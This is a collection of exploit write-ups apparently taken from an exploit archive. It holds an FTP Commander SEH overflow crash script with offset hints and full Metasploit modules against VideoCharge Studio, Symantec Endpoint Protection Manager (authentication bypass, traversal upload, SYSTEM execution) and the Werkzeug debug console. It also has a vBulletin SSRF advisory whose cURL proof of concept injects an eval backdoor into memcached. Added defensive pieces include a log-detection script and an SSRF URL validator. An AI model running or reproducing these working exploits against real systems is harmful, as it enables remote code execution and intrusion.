except (mechanize.HTTPError, mechanize.URLError) as e:
    print e.read()
********************************************************************************************
# Exploit Title: FTP Commander 'Custom Command' SEH Over-Write (Buffer Overflow).
# Date: 8/17/2015
# Exploit Author: Un_N0n
# Software Vendor : http://www.internet-soft.com/
# Software Link: http://www.internet-soft.com/ftpcomm.htm
# Version: 8.02
# Tested on: Windows 7 x32(32 BIT)
********************************************************************************************
[Steps to Produce the Crash]:
1- Open 'ftpcomm.exe'.
2- Go to FTP - Server > Custom Command.
3- Below the SERVER LIST an input box will appear; enter the contents of crash.txt into it, then press Do it!.
4- The software will crash saying 'Access Violation at address XXXXXXXX......'.
This is a basic SEH overwrite. I have tried to make a working exploit on WIN 7 x32 but no luck, since this
program does not have its own DLLs and using Windows DLLs is not a good idea b/c SAFESEH; I have tried
other techniques but the final exploit seems to be unstable.
[Code to produce crash.txt]:
junk = "A"*6000
file = open("crash.txt",'w')
file.write(junk)
file.close()
The following details are for those who would like to develop a working exploit for this software:
OFFSET: 4112 + BBBB[NSEH] + CCCC[SEH] ...
Hint: ~You can try loading the address from outside the address range of loaded modules.~ ;)
*****************************************************************************************************************************
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'VideoCharge Studio Buffer Overflow (SEH)',
      'Description'    => %q{
        This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when
        processing a specially crafted .VSC file. This vulnerability could be
        exploited by a remote attacker to execute arbitrary code on the target
        machine by enticing a user of VideoCharge Studio to open a malicious .VSC file.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'metacom', # Original discovery
          'Andrew Smith', # MSF module
          'Christian Mehlmauer' # MSF module
        ],
      'References'     =>
        [
          [ 'OSVDB', '69616' ],
          [ 'EDB', '29234' ] # reference type is EDB (Exploit-DB); original read 'EBD'
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars' => "\x00\x0a\x0d\x3c\x22\x26",
          'DisableNops' => true,
          'Space' => 2808
        },
      'Targets'        =>
        [
          [ 'VideoCharge Studio 2.12.3.685',
            {
              'Ret' => 0x61B811F1, #p/p/r | zlib1.dll
              'Offset' => 2184
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Oct 27 2013',
      'DefaultTarget'  => 0))

    register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.vsc']),], self.class)
  end

  def exploit
    buffer = rand_text_alpha(target['Offset'])
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded

    file = %Q|<?xml version="1.0" encoding="Windows-1252" ?><config ver="2.12.3.685">
<cols name="Files"/>
<cols name="Profiles">
<Property name="Profile">
<cols name="Formats">
<Property name="Stream">
<Value name="Name" type="8" value="#{buffer}"/>
</Property>
</cols>
</Property>
</cols>
</config>|

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(file)
  end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Symantec Endpoint Protection Manager Authentication Bypass and Code Execution',
      'Description'    => %q{
        This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager
        in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM. The vulnerabilities
        include an authentication bypass, a directory traversal and a privilege escalation to
        get privileged code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Markus Wulftange', #discovery
          'bperry' # metasploit module
        ],
      'References'     =>
        [
          ['CVE', '2015-1486'],
          ['CVE', '2015-1487'],
          ['CVE', '2015-1489'],
          ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
        ],
      'DefaultOptions' => {
        'SSL' => true
      },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic',
            {
              'Arch' => ARCH_X86,
              'Payload' => {
                'DisableNops' => true
              }
            }
          ],
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Jul 31 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(8443),
        OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
      ], self.class)
  end

  def exploit
    meterp = Rex::Text.rand_text_alpha(10)
    jsp = Rex::Text.rand_text_alpha(10)

    print_status("#{peer} - Getting cookie...")
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
      'method' => 'POST',
      'vars_post' => {
        'ActionType' => 'ResetPassword',
        'UserID' => 'admin',
        'Domain' => ''
      }
    })

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - The server did not respond in an expected way")
    end

    cookie = res.get_cookies
    if cookie.nil? || cookie.empty?
      fail_with(Failure::Unknown, "#{peer} - The server did not return a cookie")
    end

    exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>
<%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
}

    print_status("#{peer} - Uploading payload...")
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
      'method' => 'POST',
      'vars_get' => {
        'ActionType' => 'BinaryFile',
        'Action' => 'UploadPackage',
        'PackageFile' => "../../../tomcat/webapps/ROOT/#{meterp}.exe",
        'KnownHosts' => '.'
      },
      'data' => payload.encoded_exe,
      'cookie' => cookie,
      'ctype' => ''
    })

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
    end

    register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe")

    print_status("#{peer} - Uploading JSP page to execute the payload...")
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
      'method' => 'POST',
      'vars_get' => {
        'ActionType' => 'BinaryFile',
        'Action' => 'UploadPackage',
        'PackageFile' => "../../../tomcat/webapps/ROOT/#{jsp}.jsp",
        'KnownHosts' => '.'
      },
      'data' => exec,
      'cookie' => cookie,
      'ctype' => ''
    })

    unless res && res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
    end

    register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp")

    print_status("#{peer} - Executing payload. Manual cleanup will be required.")
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")
    }, 5)
  end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Werkzeug Debug Shell Command Execution',
      'Description'    => %q{
        This module will exploit the Werkzeug debug console to put down a
        Python shell. This debugger "must never be used on production
        machines" but sometimes slips passed testing.

        Tested against:
          0.9.6 on Debian
          0.9.6 on Centos
          0.10 on Debian
      },
      'Author'         => 'h00die <mike[at]shorebreaksecurity.com>',
      'References'     =>
        [
          ['URL', 'http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger']
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => ['python'],
      'Targets'        => [[ 'werkzeug 0.10 and older', {}]],
      'Arch'           => ARCH_PYTHON,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 28 2015'
    ))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'URI to the console', '/console'])
      ], self.class
    )
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(datastore['TARGETURI'])
    )

    # https://github.com/mitsuhiko/werkzeug/blob/cc8c8396ecdbc25bedc1cfdddfe8df2387b72ae3/werkzeug/debug/tbtools.py#L67
    if res && res.body =~ /Werkzeug powered traceback interpreter/
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    # first we need to get the SECRET code
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(datastore['TARGETURI'])
    )

    if res && res.body =~ /SECRET = "([a-zA-Z0-9]{20})";/
      secret = $1
      vprint_status("Secret Code: #{secret}")
      send_request_cgi(
        'method' => 'GET',
        'uri' => normalize_uri(datastore['TARGETURI']),
        'vars_get' => {
          '__debugger__' => 'yes',
          'cmd' => payload.encoded,
          'frm' => '0',
          's' => secret
        }
      )
    else
      print_error('Secret code not detected.')
    end
  end
end
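As an added detection-side example (not part of either Metasploit module), the Python 3 script below walks web-server access logs for the request shapes produced by the Symantec Endpoint Protection Manager module above (UploadPackage with a traversing PackageFile) and by this Werkzeug module (the console page, then __debugger__=yes with cmd and s). The log lines are constructed, the console path follows the module's default TARGETURI, and the signature names are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Common/combined log format: client - - [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def classify(method, target, status):
    """Name the finding for one request, or return None."""
    parts = urlsplit(target)
    path = parts.path
    # Lower-case the parameter names so ActionType/actiontype compare equal.
    q = {k.lower(): v for k, v in
         parse_qs(parts.query, keep_blank_values=True).items()}

    # Werkzeug module: command execution is a GET on the console URI carrying
    # __debugger__=yes, a cmd parameter and the per-process secret in s=.
    if "__debugger__" in q and "cmd" in q:
        return "werkzeug-debugger-command"

    # Recon stage of the same module: the bare console page answered with 200.
    # The console path is deployment-specific (module default: /console).
    if method == "GET" and path.rstrip("/").split("/")[-1] == "console" \
            and not q and status == "200":
        return "werkzeug-console-reachable"

    # SEPM module: UploadPackage with a traversing PackageFile is how the
    # .exe and the .jsp end up under tomcat/webapps/ROOT.
    if path.lower().endswith("/servlet/consoleservlet") \
            and q.get("action") == ["UploadPackage"]:
        for pf in q.get("packagefile", []):
            if "../" in pf or "..\\" in pf:
                return "sepm-uploadpackage-traversal"
    return None


def scan_log(text):
    """Return [(client, finding)] for every line that matches a signature."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = classify(m.group("method"), m.group("target"), m.group("status"))
        if hit:
            findings.append((m.group("client"), hit))
    return findings


# Constructed sample lines (not real traffic); the secret value is a dummy.
SAMPLE_LOG = """\
198.51.100.7 - - [18/Aug/2015:10:01:02 +0000] "GET /console HTTP/1.1" 200 5123
198.51.100.7 - - [18/Aug/2015:10:01:05 +0000] "GET /console?__debugger__=yes&cmd=print%281%29&frm=0&s=AAAAAAAAAAAAAAAAAAAA HTTP/1.1" 200 47
198.51.100.9 - - [18/Aug/2015:10:02:10 +0000] "POST /servlet/ConsoleServlet?ActionType=BinaryFile&Action=UploadPackage&PackageFile=../../../tomcat/webapps/ROOT/abcdefghij.exe&KnownHosts=. HTTP/1.1" 200 12
203.0.113.4 - - [18/Aug/2015:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 2048
"""

if __name__ == "__main__":
    for client, finding in scan_log(SAMPLE_LOG):
        print(client, finding)
```

The ResetPassword step of the SEPM module travels in the POST body, so it is not visible in a plain access log; it needs application-level logging of ConsoleServlet actions.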
vBulletin's memcache setting is vulnerable in certain versions (all
before 4.2.2) to an RCE. vBulletin seem to have refused to classify it
as a vulnerability or post anything about it, or put anything in the
announcements on their website. They say "PL2 (4.2.2) should prevent the
use of localhost," however that doesn't help people using previous
versions (which they appear to support with patches, still).
They also haven't updated previous versions of vBulletin for this bug,
despite it being reported that it works on versions prior to 4.2.2.
Of course though, the most important thing is, they haven't announced
there even is/was a vulnerability in any version.
Anyways, here it is:
Remote Upload allows to send arbitrary data to loopback-only services, possibly allowing the execution of arbitrary code Exists in vB4
The remote upload as implemented by the vB_Upload_* classes and vB_vURL (at least in vB 4.2.x, most probably earlier releases are also affected, and vB 5 might be affected as well) does not restrict the destination ports and hosts for remote uploads. This allows an attacker to abuse the function as a proxy to commit TCP port scans on other hosts. Much worse, it also allows connecting to local loopback-only services or to services only exposed on an internal network.
On a setup running e.g. Memcached in default configuration (bound to localhost:11211, no authentication), the latter can be exploited to execute arbitrary code by forging a request to memcached, updating the `pluginlist` value.
Proof-of-Concept using cURL:
—
$ curl 'http://sandbox.example.com/vb42/profile.php?do=updateprofilepic' -H 'Cookie: bb_userid=2; bb_password=926944640049f505370a38250f22ae57' --data 'do=updateprofilepic&securitytoken=1384776835-db8ce45ef28d8e2fcc1796b012f0c9ca1cf49e38&avatarurl=http://localhost:11211/%0D%0Aset%20pluginlist%200%200%2096%0D%0Aa%3A1%3A%7Bs%3A12%3A%22global_start%22%3Bs%3A62%3A%22if%28isset%28%24_REQUEST%5B%27eval%27%5D%29%29%7Beval%28%24_REQUEST%5B%27eval%27%5D%29%3Bdie%28%29%3B%7D%0D%0A%22%3B%7D%0D%0Aquit%0D%0A.png'
—
This leads to vBulletin opening a connection to the Memcached (localhost:11211) and sending the following data:
—
HEAD /
set pluginlist 0 0 96
a:1:{s:12:"global_start";s:62:"if(isset($_REQUEST['eval'])){eval($_REQUEST['eval']);die();}
";}
quit
.png HTTP/1.0
Host: localhost
User-Agent: vBulletin via PHP
Connection: close
—
This will cause the Memcached to update the `pluginlist` to contain the malicious code.
Furthermore, the remote upload happily follows all kinds of redirects if provided with an appropriate Location header.
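As an added defender-side example (not vBulletin code), the Python 3 check below implements the three controls the remote-upload code described above lacks: an allow-list of schemes and ports, rejection of CR/LF in the decoded URL (which is what lets the PoC smuggle a memcached command into the request line), and resolution of the host with every returned address checked against loopback, private and other non-routable ranges. The DNS table, host names and the policy (only ports 80 and 443) are this example's own assumptions.

```python
import ipaddress
import re
import socket
from urllib.parse import urlsplit, unquote

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")

# Constructed DNS answers so the check runs offline; a real deployment keeps
# the default resolver (socket.getaddrinfo) below.
FAKE_DNS = {
    "cdn.example.net": ["93.184.216.34"],                  # constructed public answer
    "localhost": ["127.0.0.1", "::1"],
    "intranet.example.net": ["10.0.0.5"],                  # constructed internal host
    "rebind.example.net": ["93.184.216.34", "127.0.0.1"],  # mixed public/loopback record
}


def fake_resolver(host, port, type=socket.SOCK_STREAM):
    """Stand-in for socket.getaddrinfo backed by the constructed table above."""
    try:
        addrs = [str(ipaddress.ip_address(host))]   # IP literal: no lookup needed
    except ValueError:
        addrs = FAKE_DNS.get(host)
    if not addrs:
        raise socket.gaierror("constructed NXDOMAIN for " + host)
    return [(None, type, 0, "", (a, port)) for a in addrs]


def is_public_address(addr):
    """True only for globally routable unicast addresses: loopback, RFC 1918,
    link-local, CGNAT, documentation, reserved and multicast all fail."""
    ip = ipaddress.ip_address(addr)
    return ip.is_global and not ip.is_multicast


def check_remote_url(url, resolver=socket.getaddrinfo):
    """Return (ok, reason) for a user-supplied fetch URL such as avatarurl."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if parts.username or parts.password:
        return False, "credentials in URL"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    if port is None:
        port = 443 if parts.scheme.lower() == "https" else 80
    if port not in ALLOWED_PORTS:            # the PoC targets 11211 (memcached)
        return False, "port %d not allowed" % port
    # The PoC URL-encodes CR/LF into the path so that "set pluginlist ..." lands
    # on its own line of the outgoing HTTP request; refuse any control character
    # after decoding, in the path and in the query.
    if CONTROL_CHARS.search(unquote(parts.path) + unquote(parts.query)):
        return False, "control characters in URL"
    # Resolve and vet every answer: a public name may point at 127.0.0.1 or an
    # internal range, and a multi-answer record may mix both.
    try:
        answers = resolver(host, port, type=socket.SOCK_STREAM)
    except socket.gaierror:
        return False, "unresolvable host"
    addrs = {a[4][0] for a in answers}
    if not addrs:
        return False, "unresolvable host"
    for addr in addrs:
        if not is_public_address(addr):
            return False, "host resolves to non-public address " + addr
    # The fetcher must repeat this check on every Location target, since the
    # upload code is noted above to follow redirects blindly.
    return True, "ok"


# The avatarurl value from the cURL PoC above, shortened, as a test input.
POC_URL = ("http://localhost:11211/%0D%0Aset%20pluginlist%200%200%2096%0D%0A"
           "a%3A1%3A%7B%7D%0D%0Aquit%0D%0A.png")

if __name__ == "__main__":
    for u in (POC_URL, "http://localhost/%0D%0Aquit%0D%0A.png",
              "http://intranet.example.net/avatar.png",
              "https://cdn.example.net/avatar.png"):
        print(u, "->", check_remote_url(u, resolver=fake_resolver))
```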